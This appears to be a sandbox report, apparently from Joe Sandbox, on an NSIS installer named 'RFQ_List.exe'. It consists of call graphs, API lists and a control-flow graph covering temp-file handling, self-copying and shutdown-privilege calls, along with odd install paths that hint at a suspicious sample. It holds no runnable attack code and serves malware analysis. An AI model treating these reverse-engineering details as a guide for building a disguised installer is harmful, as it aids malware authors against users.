3047->3033 3048->3033 3049 406211 SHGetPathFromIDListW CoTaskMemFree 3048->3049 3049->3033 3051 405f0a 3050->3051 3053 405f17 3050->3053 3239 405d84 lstrcpyW 3051->3239 3053->2879 3055 405774 3054->3055 3056 405768 CloseHandle 3054->3056 3055->2879 3056->3055 3058 401389 2 API calls 3057->3058 3059 401420 3058->3059 3059->2837 3066 4062f6 3060->3066 3061 40636c 3062 406371 CharPrevW 3061->3062 3064 406392 3061->3064 3062->3061 3063 40635f CharNextW 3063->3061 3063->3066 3064->2900 3065 405a36 CharNextW 3065->3066 3066->3061 3066->3063 3066->3065 3067 40634b CharNextW 3066->3067 3068 40635a CharNextW 3066->3068 3067->3066 3068->3063 3070 40328d 3069->3070 3071 405a25 lstrcatW 3069->3071 3070->2903 3071->3070 3073 405c66 GetTickCount GetTempFileNameW 3072->3073 3074 40329e 3073->3074 3075 405c9c 3073->3075 3074->2814 3075->3073 3075->3074 3076->2909 3077->2911 3079 405a63 3078->3079 3080 402e5a 3079->3080 3081 405a69 CharPrevW 3079->3081 3082 406055 lstrcpynW 3080->3082 3081->3079 3081->3080 3082->2915 3084 402d93 3083->3084 3085 402dab 3083->3085 3086 402da3 3084->3086 3087 402d9c DestroyWindow 3084->3087 3088 402db3 3085->3088 3089 402dbb GetTickCount 3085->3089 3086->2918 3087->3086 3119 406467 3088->3119 3091 402dc9 CreateDialogParamW ShowWindow 3089->3091 3092 402dec 3089->3092 3091->3092 3092->2918 3094->2926 3096 403040 3095->3096 3097 40306e 3096->3097 3125 403258 SetFilePointer 3096->3125 3099 403242 ReadFile 3097->3099 3100 403079 3099->3100 3101 4031c5 3100->3101 3102 4031db 3100->3102 3103 40308b GetTickCount 3100->3103 3101->2931 3104 40321d 3102->3104 3108 4031df 3102->3108 3103->3101 3105 4030da 3103->3105 3106 403242 ReadFile 3104->3106 3105->3101 3107 403242 ReadFile 3105->3107 3111 403130 GetTickCount 3105->3111 3112 403155 MulDiv wsprintfW 3105->3112 3123 405cdc WriteFile 3105->3123 3106->3101 3107->3105 3108->3101 3109 403242 ReadFile 3108->3109 3110 405cdc WriteFile 3108->3110 3109->3108 3110->3108 3111->3105 3126 4051b4 3112->3126 3137 405cad ReadFile 3115->3137 3118->2925 3120 406484 PeekMessageW 3119->3120 3121 402db9 3120->3121 3122 40647a DispatchMessageW 3120->3122 3121->2918 3122->3120 3124 405cfa 3123->3124 3124->3105 3125->3097 3127 405271 3126->3127 3128 4051cf 3126->3128 3127->3105 3129 4051eb lstrlenW 3128->3129 3130 406077 18 API calls 3128->3130 3131 405214 3129->3131 3132 4051f9 lstrlenW 3129->3132 3130->3129 3134 405227 3131->3134 3135 40521a SetWindowTextW 3131->3135 3132->3127 3133 40520b lstrcatW 3132->3133 3133->3131 3134->3127 3136 40522d SendMessageW SendMessageW SendMessageW 3134->3136 3135->3134 3136->3127 3138 403255 3137->3138 3138->2933 3139->2942 3141 403b88 3140->3141 3162 405f9c wsprintfW 3141->3162 3143 403bf9 3144 406077 18 API calls 3143->3144 3145 403c05 SetWindowTextW 3144->3145 3146 403929 3145->3146 3147 403c21 3145->3147 3146->2948 3147->3146 3148 406077 18 API calls 3147->3148 3148->3147 3150 4038fa 3149->3150 3151 405f56 RegQueryValueExW 3149->3151 3150->2944 3150->2945 3152 405f77 RegCloseKey 3151->3152 3152->3150 3154->2950 3163 404165 3155->3163 3157 4052aa 3160 4052d1 3157->3160 3166 401389 3157->3166 3158 404165 SendMessageW 3159 4052e3 OleUninitialize 3158->3159 3159->2980 3160->3158 3162->3143 3164 40417d 3163->3164 3165 40416e SendMessageW 3163->3165 3164->3157 3165->3164 3168 401390 3166->3168 3167 4013fe 3167->3157 3168->3167 3169 4013cb MulDiv SendMessageW 3168->3169 3169->3168 3170->2994 3172 405ad1 3171->3172 3173 405ae3 3171->3173 3172->3173 3174 405ade CharNextW 3172->3174 3175 405a36 CharNextW 3173->3175 3176 405b07 3173->3176 3174->3176 3175->3173 3176->2997 3176->2998 3178 4063b9 3177->3178 3179 4063ae FindClose 3177->3179 3178->3004 3179->3178 3181 403817 3180->3181 3182 4037e1 3181->3182 3183 40381c FreeLibrary GlobalFree 3181->3183 3184 405846 3182->3184 3183->3182 3183->3183 3185 405b11 18 API calls 3184->3185 3186 405866 3185->3186 3187 405885 3186->3187 3188 40586e DeleteFileW 3186->3188 3190 4059a5 3187->3190 3223 406055 lstrcpynW 3187->3223 3189 4035f6 OleUninitialize 3188->3189 3189->2834 3189->2835 3190->3189 3197 406398 2 API calls 3190->3197 3192 4058ab 3193 4058b1 lstrcatW 3192->3193 3194 4058be 3192->3194 3195 4058c4 3193->3195 3196 405a55 2 API calls 3194->3196 3199 4058d4 lstrcatW 3195->3199 3201 4058df lstrlenW FindFirstFileW 3195->3201 3196->3195 3198 4059ca 3197->3198 3198->3189 3200 4059ce 3198->3200 3199->3201 3202 405a09 3 API calls 3200->3202 3201->3190 3208 405901 3201->3208 3203 4059d4 3202->3203 3205 4057fe 5 API calls 3203->3205 3204 405988 FindNextFileW 3204->3208 3209 40599e FindClose 3204->3209 3207 4059e0 3205->3207 3210 4059e4 3207->3210 3211 4059fa 3207->3211 3208->3204 3221 405949 3208->3221 3224 406055 lstrcpynW 3208->3224 3209->3190 3210->3189 3214 4051b4 25 API calls 3210->3214 3213 4051b4 25 API calls 3211->3213 3213->3189 3216 4059f1 3214->3216 3215 405846 62 API calls 3215->3221 3218 405ef6 38 API calls 3216->3218 3217 4051b4 25 API calls 3217->3204 3220 4059f8 3218->3220 3219 4051b4 25 API calls 3219->3221 3220->3189 3221->3204 3221->3215 3221->3217 3221->3219 3222 405ef6 38 API calls 3221->3222 3225 4057fe 3221->3225 3222->3221 3223->3192 3224->3208 3233 405c05 GetFileAttributesW 3225->3233 3228 405821 DeleteFileW 3230 405827 3228->3230 3229 405819 RemoveDirectoryW 3229->3230 3231 40582b 3230->3231 3232 405837 SetFileAttributesW 3230->3232 3231->3221 3232->3231 3234 40580a 3233->3234 3235 405c17 SetFileAttributesW 3233->3235 3234->3228 3234->3229 3234->3231 3235->3234 3236->3033 3237->3033 3238->3035 3240 405dd2 GetShortPathNameW 3239->3240 3241 405dac 3239->3241 3242 405ef1 3240->3242 3243 405de7 3240->3243 3266 405c2a GetFileAttributesW CreateFileW 3241->3266 3242->3053 3243->3242 3245 405def wsprintfA 3243->3245 3248 406077 18 API calls 3245->3248 3246 405db6 CloseHandle GetShortPathNameW 3246->3242 3247 405dca 3246->3247 3247->3240 3247->3242 3249 405e17 3248->3249 3267 405c2a GetFileAttributesW CreateFileW 3249->3267 3251 405e24 3251->3242 3252 405e33 GetFileSize GlobalAlloc 3251->3252 3253 405e55 3252->3253 3254 405eea CloseHandle 3252->3254 3255 405cad ReadFile 3253->3255 3254->3242 3256 405e5d 3255->3256 3256->3254 3268 405b8f lstrlenA 3256->3268 3259 405e74 lstrcpyA 3262 405e96 3259->3262 3260 405e88 3261 405b8f 4 API calls 3260->3261 3261->3262 3263 405ecd SetFilePointer 3262->3263 3264 405cdc WriteFile 3263->3264 3265 405ee3 GlobalFree 3264->3265 3265->3254 3266->3246 3267->3251 3269 405bd0 lstrlenA 3268->3269 3270 405ba9 lstrcmpiA 3269->3270 3271 405bd8 3269->3271 3270->3271 3272 405bc7 CharNextA 3270->3272 3271->3259 3271->3260 3272->3269 4126 401ca3 4127 402ba2 18 API calls 4126->4127 4128 401ca9 IsWindow 4127->4128 4129 401a05 4128->4129 4130 402a27 SendMessageW 4131 402a41 InvalidateRect 4130->4131 4132 402a4c 4130->4132 4131->4132 3458 405128 3459 405138 3458->3459 3460 40514c 3458->3460 3462 405195 3459->3462 3463 40513e 3459->3463 3461 405154 IsWindowVisible 3460->3461 3470 405174 3460->3470 3461->3462 3465 405161 3461->3465 3466 40519a CallWindowProcW 3462->3466 3464 404165 SendMessageW 3463->3464 3467 405148 3464->3467 3472 404a7e SendMessageW 3465->3472 3466->3467 3470->3466 3477 404afe 3470->3477 3473 404aa1 GetMessagePos ScreenToClient SendMessageW 3472->3473 3474 404add SendMessageW 3472->3474 3475 404ad5 3473->3475 3476 404ada 3473->3476 3474->3475 3475->3470 3476->3474 3486 406055 lstrcpynW 3477->3486 3479 404b11 3487 405f9c wsprintfW 3479->3487 3481 404b1b 3482 40140b 2 API calls 3481->3482 3483 404b24 3482->3483 3488 406055 lstrcpynW 3483->3488 3485 404b2b 3485->3462 3486->3479 3487->3481 3488->3485 3489 40242a 3500 402cc9 3489->3500 3491 402434 3492 402bbf 18 API calls 3491->3492 3493 40243d 3492->3493 3494 402448 RegQueryValueExW 3493->3494 3499 40281e 3493->3499 3495 40246e RegCloseKey 3494->3495 3496 402468 3494->3496 3495->3499 3496->3495 3504 405f9c wsprintfW 3496->3504 3501 402bbf 18 API calls 3500->3501 3502 402ce2 3501->3502 3503 402cf0 RegOpenKeyExW 3502->3503 3503->3491 3504->3495 4133 40422d lstrcpynW lstrlenW 4134 40172d 4135 402bbf 18 API calls 4134->4135 4136 401734 SearchPathW 4135->4136 4137 40174f 4136->4137 3505 404b30 GetDlgItem GetDlgItem 3506 404b82 7 API calls 3505->3506 3515 404d9b 3505->3515 3507 404c25 DeleteObject 3506->3507 3508 404c18 SendMessageW 3506->3508 3509 404c2e 3507->3509 3508->3507 3511 404c3d 3509->3511 3512 404c65 3509->3512 3510 404e7f 3517 404f2b 3510->3517 3523 405113 3510->3523 3524 404ed8 SendMessageW 3510->3524 3513 406077 18 API calls 3511->3513 3516 404119 19 API calls 3512->3516 3518 404c47 SendMessageW SendMessageW 3513->3518 3514 404e60 3514->3510 3526 404e71 SendMessageW 3514->3526 3515->3510 3515->3514 3521 404dfb 3515->3521 3522 404c79 3516->3522 3519 404f35 SendMessageW 3517->3519 3520 404f3d 3517->3520 3518->3509 3519->3520 3527 404f66 3520->3527 3533 404f56 3520->3533 3534 404f4f ImageList_Destroy 3520->3534 3528 404a7e 5 API calls 3521->3528 3529 404119 19 API calls 3522->3529 3525 404180 8 API calls 3523->3525 3524->3523 3531 404eed SendMessageW 3524->3531 3532 405121 3525->3532 3526->3510 3530 4050d5 3527->3530 3551 404afe 4 API calls 3527->3551 3555 404fa1 3527->3555 3542 404e0c 3528->3542 3544 404c87 3529->3544 3530->3523 3538 4050e7 ShowWindow GetDlgItem ShowWindow 3530->3538 3537 404f00 3531->3537 3533->3527 3535 404f5f GlobalFree 3533->3535 3534->3533 3535->3527 3536 404d5c GetWindowLongW SetWindowLongW 3539 404d75 3536->3539 3545 404f11 SendMessageW 3537->3545 3538->3523 3540 404d93 3539->3540 3541 404d7b ShowWindow 3539->3541 3561 40414e SendMessageW 3540->3561 3560 40414e SendMessageW 3541->3560 3542->3514 3543 404cd7 SendMessageW 3543->3544 3544->3536 3544->3543 3546 404d56 3544->3546 3549 404d13 SendMessageW 3544->3549 3550 404d24 SendMessageW 3544->3550 3545->3517 3546->3536 3546->3539 3549->3544 3550->3544 3551->3555 3552 404d8e 3552->3523 3553 4050ab InvalidateRect 3553->3530 3554 4050c1 3553->3554 3562 404a39 3554->3562 3556 404fcf SendMessageW 3555->3556 3559 404fe5 3555->3559 3556->3559 3558 405059 SendMessageW SendMessageW 3558->3559 3559->3553 3559->3558 3560->3552 3561->3515 3565 404970 3562->3565 3564 404a4e 3564->3530 3566 404989 3565->3566 3567 406077 18 API calls 3566->3567 3568 4049ed 3567->3568 3569 406077 18 API calls 3568->3569 3570 4049f8 3569->3570 3571 406077 18 API calls 3570->3571 3572 404a0e lstrlenW wsprintfW SetDlgItemTextW 3571->3572 3572->3564 4138 4045b4 4139 4045e0 4138->4139 4140 4045f1 4138->4140 4199 40577e GetDlgItemTextW 4139->4199 4142 4045fd GetDlgItem 4140->4142 4147 40465c 4140->4147 4144 404611 4142->4144 4143 4045eb 4146 4062e9 5 API calls 4143->4146 4150 404625 SetWindowTextW 4144->4150 4155 405ab4 4 API calls 4144->4155 4145 404740 4148 4048ef 4145->4148 4201 40577e GetDlgItemTextW 4145->4201 4146->4140 4147->4145 4147->4148 4151 406077 18 API calls 4147->4151 4154 404180 8 API calls 4148->4154 4153 404119 19 API calls 4150->4153 4157 4046d0 SHBrowseForFolderW 4151->4157 4152 404770 4158 405b11 18 API calls 4152->4158 4159 404641 4153->4159 4160 404903 4154->4160 4156 40461b 4155->4156 4156->4150 4164 405a09 3 API calls 4156->4164 4157->4145 4161 4046e8 CoTaskMemFree 4157->4161 4162 404776 4158->4162 4163 404119 19 API calls 4159->4163 4165 405a09 3 API calls 4161->4165 4202 406055 lstrcpynW 4162->4202 4166 40464f 4163->4166 4164->4150 4167 4046f5 4165->4167 4200 40414e SendMessageW 4166->4200 4170 40472c SetDlgItemTextW 4167->4170 4175 406077 18 API calls 4167->4175 4170->4145 4171 404655 4173 40642b 5 API calls 4171->4173 4172 40478d 4174 40642b 5 API calls 4172->4174 4173->4147 4181 404794 4174->4181 4176 404714 lstrcmpiW 4175->4176 4176->4170 4179 404725 lstrcatW 4176->4179 4177 4047d5 4203 406055 lstrcpynW 4177->4203 4179->4170 4180 4047dc 4182 405ab4 4 API calls 4180->4182 4181->4177 4185 405a55 2 API calls 4181->4185 4187 40482d 4181->4187 4183 4047e2 GetDiskFreeSpaceW 4182->4183 4186 404806 MulDiv 4183->4186 4183->4187 4185->4181 4186->4187 4188 40489e 4187->4188 4190 404a39 21 API calls 4187->4190 4189 4048c1 4188->4189 4191 40140b 2 API calls 4188->4191 4204 40413b EnableWindow 4189->4204 4192 40488b 4190->4192 4191->4189 4194 4048a0 SetDlgItemTextW 4192->4194 4195 404890 4192->4195 4194->4188 4197 404970 21 API calls 4195->4197 4196 4048dd 4196->4148 4205 404549 4196->4205 4197->4188 4199->4143 4200->4171 4201->4152 4202->4172 4203->4180 4204->4196 4206 404557 4205->4206 4207 40455c SendMessageW 4205->4207 4206->4207 4207->4148 4208 4027b4 4209 4027ba 4208->4209 4210 4027c2 FindClose 4209->4210 4211 402a4c 4209->4211 4210->4211 4212 4042b6 4213 4042ce 4212->4213 4217 4043e8 4212->4217 4218 404119 19 API calls 4213->4218 4214 404452 4215 404524 4214->4215 4216 40445c GetDlgItem 4214->4216 4223 404180 8 API calls 4215->4223 4219 4044e5 4216->4219 4220 404476 4216->4220 4217->4214 4217->4215 4221 404423 GetDlgItem SendMessageW 4217->4221 4222 404335 4218->4222 4219->4215 4225 4044f7 4219->4225 4220->4219 4224 40449c 6 API calls 4220->4224 4243 40413b EnableWindow 4221->4243 4227 404119 19 API calls 4222->4227 4233 40451f 4223->4233 4224->4219 4228 40450d 4225->4228 4229 4044fd SendMessageW 4225->4229 4231 404342 CheckDlgButton 4227->4231 4232 404513 SendMessageW 4228->4232 4228->4233 4229->4228 4230 40444d 4234 404549 SendMessageW 4230->4234 4241 40413b EnableWindow 4231->4241 4232->4233 4234->4214 4236 404360 GetDlgItem 4242 40414e SendMessageW 4236->4242 4238 404376 SendMessageW 4239 404393 GetSysColor 4238->4239 4240 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4238->4240 4239->4240 4240->4233 4241->4236 4242->4238 4243->4230 3595 401b37 3596 401b44 3595->3596 3597 401b88 3595->3597 3598 401bcd 3596->3598 3605 401b5b 3596->3605 3599 401bb2 GlobalAlloc 3597->3599 3600 401b8d 3597->3600 3602 406077 18 API calls 3598->3602 3608 402288 3598->3608 3601 406077 18 API calls 3599->3601 3600->3608 3616 406055 lstrcpynW 3600->3616 3601->3598 3604 402282 3602->3604 3609 40579a MessageBoxIndirectW 3604->3609 3614 406055 lstrcpynW 3605->3614 3606 401b9f GlobalFree 3606->3608 3609->3608 3610 401b6a 3615 406055 lstrcpynW 3610->3615 3612 401b79 3617 406055 lstrcpynW 3612->3617 3614->3610 3615->3612 3616->3606 3617->3608 4244 402537 4245 402562 4244->4245 4246 40254b 4244->4246 4248 402596 4245->4248 4249 402567 4245->4249 4247 402ba2 18 API calls 4246->4247 4255 402552 4247->4255 4251 402bbf 18 API calls 4248->4251 4250 402bbf 18 API calls 4249->4250 4252 40256e WideCharToMultiByte lstrlenA 4250->4252 4253 40259d lstrlenW 4251->4253 4252->4255 4253->4255 4254 4025e0 4255->4254 4257 405d0b 5 API calls 4255->4257 4258 4025ca 4255->4258 4256 405cdc WriteFile 4256->4254 4257->4258 4258->4254 4258->4256 4259 4014b8 4260 4014be 4259->4260 4261 401389 2 API calls 4260->4261 4262 4014c6 4261->4262 3624 4015b9 3625 402bbf 18 API calls 3624->3625 3626 4015c0 3625->3626 3627 405ab4 4 API calls 3626->3627 3641 4015c9 3627->3641 3628 401629 3630 40165b 3628->3630 3631 40162e 3628->3631 3629 405a36 CharNextW 3629->3641 3633 401423 25 API calls 3630->3633 3632 401423 25 API calls 3631->3632 3634 401635 3632->3634 3640 401653 3633->3640 3643 406055 lstrcpynW 3634->3643 3635 405700 2 API calls 3635->3641 3637 40571d 5 API calls 3637->3641 3638 401642 SetCurrentDirectoryW 3638->3640 3639 40160f GetFileAttributesW 3639->3641 3641->3628 3641->3629 3641->3635 3641->3637 3641->3639 3642 405683 4 API calls 3641->3642 3642->3641 3643->3638

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 7 4032de 1->7 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 7->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 27 4033b1-4033b7 24->27 28 4033aa-4033af 24->28 34 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->34 35 403526-403540 DeleteFileW call 402dee 25->35 29 4033b9-4033bd 27->29 30 4033be-4033c2 27->30 28->27 28->28 29->30 32 403480-40348d call 405a36 30->32 33 4033c8-4033ce 30->33 48 403491-403497 32->48 49 40348f-403490 32->49 37 4033d0-4033d7 33->37 38 4033e8-403421 33->38 34->35 54 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 34->54 50 4035f1-403602 call 4037c4 OleUninitialize 35->50 51 403546-40354c 35->51 43 4033d9-4033dc 37->43 44 4033de 37->44 45 403423-403428 38->45 46 40343e-403478 38->46 43->38 43->44 44->38 45->46 52 40342a-403432 45->52 46->32 53 40347a-40347e 46->53 48->24 55 40349d 48->55 49->48 71 403728-40372e 50->71 72 403608-403618 call 40579a ExitProcess 50->72 56 4035e1-4035e8 call 40389e 51->56 57 403552-40355d call 405a36 51->57 59 403434-403437 52->59 60 403439 52->60 53->32 61 40349f-4034ad call 406055 53->61 54->35 54->50 63 4034b2 55->63 70 4035ed 56->70 75 4035ab-4035b5 57->75 76 40355f-403594 57->76 59->46 59->60 60->46 61->63 63->25 70->50 73 403730-403746 GetCurrentProcess OpenProcessToken 71->73 74 4037ac-4037b4 71->74 78 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 73->78 79 40377c-40378a call 40642b 73->79 81 4037b6 74->81 82 4037ba-4037be ExitProcess 74->82 83 4035b7-4035c5 call 405b11 75->83 84 40361e-403632 call 40571d lstrcatW 75->84 80 403596-40359a 76->80 78->79 98 403798-4037a3 ExitWindowsEx 79->98 99 40378c-403796 79->99 87 4035a3-4035a7 80->87 88 40359c-4035a1 80->88 81->82 83->50 95 4035c7-4035dd call 406055 * 2 83->95 96 403634-40363a lstrcatW 84->96 97 40363f-403659 lstrcatW lstrcmpiW 84->97 87->80 93 4035a9 87->93 88->87 88->93 93->75 95->56 96->97 97->50 101 40365b-40365e 97->101 98->74 102 4037a5-4037a7 call 40140b 98->102 99->98 99->102 104 403660-403665 call 405683 101->104 105 403667 call 405700 101->105 102->74 113 40366c-40367a SetCurrentDirectoryW 104->113 105->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 125 40371c-403723 call 405ef6 122->125 123->122 124 4036e5-403705 call 405ef6 call 406077 call 405735 123->124 124->122 134 403707-40370e CloseHandle 124->134 125->50 134->122
                  APIs
                  • SetErrorMode.KERNELBASE ref: 004032C2
                  • GetVersion.KERNEL32 ref: 004032C8
                  • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                  • OleInitialize.OLE32(00000000), ref: 0040331F
                  • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                  • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\RFQ_List.exe",00000000), ref: 00403363
                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\RFQ_List.exe",00000020), ref: 0040338A
                    • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                    • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                  • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                    • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                  • OleUninitialize.OLE32(?), ref: 004035F6
                  • ExitProcess.KERNEL32 ref: 00403618
                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ_List.exe",00000000,?), ref: 0040362B
                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ_List.exe",00000000,?), ref: 0040363A
                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ_List.exe",00000000,?), ref: 00403645
                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ_List.exe",00000000,?), ref: 00403651
                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                  • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\RFQ_List.exe,0042AA28,00000001), ref: 004036DB
                  • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                  • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                  • ExitProcess.KERNEL32 ref: 004037BE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                  • String ID: "C:\Users\user\Desktop\RFQ_List.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes$C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ_List.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                  • API String ID: 3586999533-3841915379
                  • Opcode ID: 7aacc1c0a5729f3ef0a85289c626a3cb867d7b07120bbbf6836a4d0ed1df39ea
                  • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                  • Opcode Fuzzy Hash: 7aacc1c0a5729f3ef0a85289c626a3cb867d7b07120bbbf6836a4d0ed1df39ea
                  • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 143 404c2e-404c36 138->143 139->138 142 404dbb-404dc4 140->142 141->142 144 404dc6-404dc9 142->144 145 404dcf-404dd5 142->145 146 404c38-404c3b 143->146 147 404c5f-404c63 143->147 144->145 148 404eb3-404eba 144->148 151 404de4-404deb 145->151 152 404dd7-404dde 145->152 149 404c40-404c5d call 406077 SendMessageW * 2 146->149 150 404c3d 146->150 147->143 153 404c65-404c91 call 404119 * 2 147->153 158 404f2b-404f33 148->158 159 404ebc-404ec2 148->159 149->147 150->149 155 404e60-404e63 151->155 156 404ded-404df0 151->156 152->148 152->151 195 404c97-404c9d 153->195 196 404d5c-404d6f GetWindowLongW SetWindowLongW 153->196 155->148 160 404e65-404e6f 155->160 164 404df2-404df9 156->164 165 404dfb-404e10 call 404a7e 156->165 162 404f35-404f3b SendMessageW 158->162 163 404f3d-404f44 158->163 167 405113-405125 call 404180 159->167 168 404ec8-404ed2 159->168 171 404e71-404e7d SendMessageW 160->171 172 404e7f-404e89 160->172 162->163 173 404f46-404f4d 163->173 174 404f78-404f7f 163->174 164->155 164->165 165->155 194 404e12-404e23 165->194 168->167 169 404ed8-404ee7 SendMessageW 168->169 169->167 179 404eed-404efe SendMessageW 169->179 171->172 172->148 181 404e8b-404e95 172->181 182 404f56-404f5d 173->182 183 404f4f-404f50 ImageList_Destroy 173->183 177 4050d5-4050dc 174->177 178 404f85-404f91 call 4011ef 174->178 177->167 189 4050de-4050e5 177->189 205 404fa1-404fa4 178->205 206 404f93-404f96 178->206 187 404f00-404f06 179->187 188 404f08-404f0a 179->188 190 404ea6-404eb0 181->190 191 404e97-404ea4 181->191 192 404f66-404f72 182->192 193 404f5f-404f60 GlobalFree 182->193 183->182 187->188 199 404f0b-404f24 call 401299 SendMessageW 187->199 188->199 189->167 200 4050e7-405111 ShowWindow GetDlgItem ShowWindow 189->200 190->148 191->148 192->174 193->192 194->155 202 404e25-404e27 194->202 197 404ca0-404ca7 195->197 201 404d75-404d79 196->201 203 404d3d-404d50 197->203 204 404cad-404cd5 197->204 199->158 200->167 208 404d93-404d9b call 40414e 201->208 209 404d7b-404d8e ShowWindow call 40414e 201->209 210 404e29-404e30 202->210 211 404e3a 202->211 203->197 220 404d56-404d5a 203->220 214 404cd7-404d0d SendMessageW 204->214 215 404d0f-404d11 204->215 221 404fe5-405009 call 4011ef 205->221 222 404fa6-404fbf call 4012e2 call 401299 205->222 217 404f98 206->217 218 404f99-404f9c call 404afe 206->218 208->137 209->167 212 404e32-404e34 210->212 213 404e36-404e38 210->213 216 404e3d-404e59 call 40117d 211->216 212->216 213->216 214->203 226 404d13-404d22 SendMessageW 215->226 227 404d24-404d3a SendMessageW 215->227 216->155 217->218 218->205 220->196 220->201 236 